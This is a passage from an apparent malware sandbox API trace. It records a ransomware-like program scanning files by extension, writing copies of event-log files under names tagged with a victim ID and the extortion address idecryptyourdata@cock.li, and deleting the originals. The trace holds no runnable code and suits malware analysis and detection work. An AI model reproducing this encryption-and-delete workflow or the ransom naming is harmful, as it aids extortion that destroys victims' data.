(lpString=".jpg") returned 4 [0060.447] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0060.447] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.447] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.447] lstrlenW (lpString=".doc") returned 4 [0060.447] lstrcmpiW (lpString1=".doc", lpString2=".msu") returned -1 [0060.447] lstrlenW (lpString=".docx") returned 5 [0060.447] lstrcmpiW (lpString1=".docx", lpString2="6.msu") returned -1 [0060.447] lstrlenW (lpString=".pdf") returned 4 [0060.447] lstrcmpiW (lpString1=".pdf", lpString2=".msu") returned 1 [0060.447] lstrlenW (lpString=".xls") returned 4 [0060.447] lstrcmpiW (lpString1=".xls", lpString2=".msu") returned 1 [0060.447] lstrlenW (lpString=".xlsx") returned 5 [0060.447] lstrcmpiW (lpString1=".xlsx", lpString2="6.msu") returned -1 [0060.447] lstrlenW (lpString=".ppt") returned 4 [0060.447] lstrcmpiW (lpString1=".ppt", lpString2=".msu") returned 1 [0060.447] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.447] lstrlenW (lpString=".zip") returned 4 [0060.447] lstrcmpiW (lpString1=".zip", lpString2=".msu") returned 1 [0060.448] lstrlenW (lpString=".rar") returned 4 [0060.448] lstrcmpiW (lpString1=".rar", lpString2=".msu") returned 1 [0060.448] lstrlenW (lpString=".bz2") returned 4 [0060.448] lstrcmpiW (lpString1=".bz2", lpString2=".msu") returned -1 [0060.448] lstrlenW (lpString=".7z") returned 3 [0060.448] lstrcmpiW (lpString1=".7z", lpString2="msu") returned -1 [0060.448] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.448] lstrlenW (lpString=".dbf") returned 4 [0060.448] lstrcmpiW (lpString1=".dbf", lpString2=".msu") returned -1 [0060.448] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.448] lstrlenW (lpString=".1cd") returned 4 [0060.448] lstrcmpiW (lpString1=".1cd", lpString2=".msu") returned -1 [0060.448] lstrlenW (lpString="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu") returned 55 [0060.448] lstrlenW (lpString=".jpg") returned 4 [0060.448] lstrcmpiW (lpString1=".jpg", lpString2=".msu") returned -1 [0060.448] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0060.448] lstrlenW (lpString="Internet Explorer.evtx") returned 22 [0060.448] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0060.467] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0060.467] CloseHandle (hObject=0x2c8) returned 1 [0060.467] GetFileAttributesW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx")) returned 0x20 [0060.467] GetFileAttributesW (lpFileName="C:\\Logs\\Internet Explorer.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\internet explorer.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.467] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0060.467] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.467] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.467] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\internet explorer.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0060.468] GetLastError () returned 0x0 [0060.468] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0060.478] WriteFile (in: hFile=0x370, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0060.480] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.480] WriteFile (in: hFile=0x370, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x100, lpOverlapped=0x0) returned 1 [0060.480] SetEndOfFile (hFile=0x370) returned 1 [0060.480] CloseHandle (hObject=0x370) returned 1 [0060.482] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.482] SetEndOfFile (hFile=0x2c8) returned 1 [0060.483] CloseHandle (hObject=0x2c8) returned 1 [0060.483] SetFileAttributesW (lpFileName="C:\\Logs\\Internet Explorer.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0060.483] DeleteFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx")) returned 1 [0060.483] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.483] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.483] lstrlenW (lpString=".doc") returned 4 [0060.483] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0060.483] lstrlenW (lpString=".docx") returned 5 [0060.483] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0060.483] lstrlenW (lpString=".pdf") returned 4 [0060.483] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0060.483] lstrlenW (lpString=".xls") returned 4 [0060.483] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0060.483] lstrlenW (lpString=".xlsx") returned 5 [0060.484] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0060.484] lstrlenW (lpString=".ppt") returned 4 [0060.484] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.484] lstrlenW (lpString=".zip") returned 4 [0060.484] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString=".rar") returned 4 [0060.484] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString=".bz2") returned 4 [0060.484] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString=".7z") returned 3 [0060.484] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0060.484] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.484] lstrlenW (lpString=".dbf") returned 4 [0060.484] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.484] lstrlenW (lpString=".1cd") returned 4 [0060.484] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.484] lstrlenW (lpString=".jpg") returned 4 [0060.484] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.484] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.484] lstrlenW (lpString=".doc") returned 4 [0060.484] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString=".docx") returned 5 [0060.484] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0060.484] lstrlenW (lpString=".pdf") returned 4 [0060.484] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString=".xls") returned 4 [0060.484] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0060.484] lstrlenW (lpString=".xlsx") returned 5 [0060.485] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0060.485] lstrlenW (lpString=".ppt") returned 4 [0060.485] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0060.485] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.485] lstrlenW (lpString=".zip") returned 4 [0060.485] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0060.485] lstrlenW (lpString=".rar") returned 4 [0060.485] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0060.485] lstrlenW (lpString=".bz2") returned 4 [0060.485] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0060.485] lstrlenW (lpString=".7z") returned 3 [0060.485] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0060.485] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.485] lstrlenW (lpString=".dbf") returned 4 [0060.485] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0060.485] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.485] lstrlenW (lpString=".1cd") returned 4 [0060.485] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0060.485] lstrlenW (lpString="C:\\Logs\\Internet Explorer.evtx") returned 30 [0060.485] lstrlenW (lpString=".jpg") returned 4 [0060.485] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0060.485] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0060.485] lstrlenW (lpString="Key Management Service.evtx") returned 27 [0060.485] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0060.486] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0060.486] CloseHandle (hObject=0x2c8) returned 1 [0060.486] GetFileAttributesW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx")) returned 0x20 [0060.486] GetFileAttributesW (lpFileName="C:\\Logs\\Key Management Service.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\key management service.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.486] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0060.486] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.486] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.486] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\key management service.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0060.486] GetLastError () returned 0x0 [0060.486] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0060.488] WriteFile (in: hFile=0x370, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0060.490] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0060.490] WriteFile (in: hFile=0x370, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x10a, lpOverlapped=0x0) returned 1 [0060.490] SetEndOfFile (hFile=0x370) returned 1 [0060.490] CloseHandle (hObject=0x370) returned 1 [0060.492] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.492] SetEndOfFile (hFile=0x2c8) returned 1 [0060.493] CloseHandle (hObject=0x2c8) returned 1 [0060.493] SetFileAttributesW (lpFileName="C:\\Logs\\Key Management Service.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0060.493] DeleteFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx")) returned 1 [0060.493] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.494] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.494] lstrlenW (lpString=".doc") returned 4 [0060.494] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString=".docx") returned 5 [0060.494] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0060.494] lstrlenW (lpString=".pdf") returned 4 [0060.494] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString=".xls") returned 4 [0060.494] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString=".xlsx") returned 5 [0060.494] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0060.494] lstrlenW (lpString=".ppt") returned 4 [0060.494] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.494] lstrlenW (lpString=".zip") returned 4 [0060.494] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString=".rar") returned 4 [0060.494] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString=".bz2") returned 4 [0060.494] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString=".7z") returned 3 [0060.494] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0060.494] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.494] lstrlenW (lpString=".dbf") returned 4 [0060.494] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.494] lstrlenW (lpString=".1cd") returned 4 [0060.494] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.494] lstrlenW (lpString=".jpg") returned 4 [0060.494] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0060.494] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.494] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.494] lstrlenW (lpString=".doc") returned 4 [0060.494] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0060.495] lstrlenW (lpString=".docx") returned 5 [0060.495] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0060.495] lstrlenW (lpString=".pdf") returned 4 [0060.495] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0060.495] lstrlenW (lpString=".xls") returned 4 [0060.495] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0060.495] lstrlenW (lpString=".xlsx") returned 5 [0060.495] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0060.495] lstrlenW (lpString=".ppt") returned 4 [0060.495] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0060.495] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.495] lstrlenW (lpString=".zip") returned 4 [0060.495] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0060.495] lstrlenW (lpString=".rar") returned 4 [0060.495] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0060.495] lstrlenW (lpString=".bz2") returned 4 [0060.495] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0060.495] lstrlenW (lpString=".7z") returned 3 [0060.495] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0060.495] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.495] lstrlenW (lpString=".dbf") returned 4 [0060.495] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0060.495] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.495] lstrlenW (lpString=".1cd") returned 4 [0060.495] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0060.495] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0060.495] lstrlenW (lpString=".jpg") returned 4 [0060.495] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0060.495] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0060.496] lstrlenW (lpString="Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 47 [0060.496] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0060.496] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0060.496] CloseHandle (hObject=0x2c8) returned 1 [0060.496] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx")) returned 0x20 [0060.496] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0060.496] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0060.496] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.496] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.496] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0061.271] GetLastError () returned 0x0 [0061.271] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x11000, lpOverlapped=0x0) returned 1 [0061.273] WriteFile (in: hFile=0x380, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x11010, lpOverlapped=0x0) returned 1 [0061.274] ReadFile (in: hFile=0x2c8, lpBuffer=0x3f14020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x320fecc, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesRead=0x320fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.275] WriteFile (in: hFile=0x380, lpBuffer=0x3f14020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x320fc94, lpOverlapped=0x0 | out: lpBuffer=0x3f14020*, lpNumberOfBytesWritten=0x320fc94*=0x132, lpOverlapped=0x0) returned 1 [0061.275] SetEndOfFile (hFile=0x380) returned 1 [0061.275] CloseHandle (hObject=0x380) returned 1 [0061.276] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x320fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.277] SetEndOfFile (hFile=0x2c8) returned 1 [0061.278] CloseHandle (hObject=0x2c8) returned 1 [0061.278] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0061.278] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx" (normalized: "c:\\logs\\microsoft-client-licensing-platform%4admin.evtx")) returned 1 [0061.278] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.278] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.278] lstrlenW (lpString=".doc") returned 4 [0061.278] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.278] lstrlenW (lpString=".docx") returned 5 [0061.279] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.279] lstrlenW (lpString=".pdf") returned 4 [0061.279] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.279] lstrlenW (lpString=".xls") returned 4 [0061.279] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.279] lstrlenW (lpString=".xlsx") returned 5 [0061.279] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.279] lstrlenW (lpString=".ppt") returned 4 [0061.279] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.279] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.279] lstrlenW (lpString=".zip") returned 4 [0061.279] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.279] lstrlenW (lpString=".rar") returned 4 [0061.279] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.279] lstrlenW (lpString=".bz2") returned 4 [0061.279] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.279] lstrlenW (lpString=".7z") returned 3 [0061.279] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.279] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.279] lstrlenW (lpString=".dbf") returned 4 [0061.279] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.279] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.279] lstrlenW (lpString=".1cd") returned 4 [0061.279] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.279] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.279] lstrlenW (lpString=".jpg") returned 4 [0061.279] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.280] lstrlenW (lpString=".doc") returned 4 [0061.280] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString=".docx") returned 5 [0061.280] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0061.280] lstrlenW (lpString=".pdf") returned 4 [0061.280] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString=".xls") returned 4 [0061.280] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString=".xlsx") returned 5 [0061.280] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0061.280] lstrlenW (lpString=".ppt") returned 4 [0061.280] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.280] lstrlenW (lpString=".zip") returned 4 [0061.280] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString=".rar") returned 4 [0061.280] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString=".bz2") returned 4 [0061.280] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString=".7z") returned 3 [0061.280] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0061.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.280] lstrlenW (lpString=".dbf") returned 4 [0061.280] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.280] lstrlenW (lpString=".1cd") returned 4 [0061.280] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0061.280] lstrlenW (lpString="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx") returned 55 [0061.280] lstrlenW (lpString=".jpg") returned 4 [0061.280] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0061.280] lstrcmpiW (lpString1=".evtx", lpString2=".bat") returned 1 [0061.281] lstrlenW (lpString="Microsoft-Windows-AppLocker%4EXE and DLL.evtx") returned 45 [0061.281] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0061.281] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x320ff14 | out: lpFileSize=0x320ff14*=69632) returned 1 [0061.281] CloseHandle (hObject=0x2c8) returned 1 [0061.281] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4exe and dll.evtx")) returned 0x20 [0061.281] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and 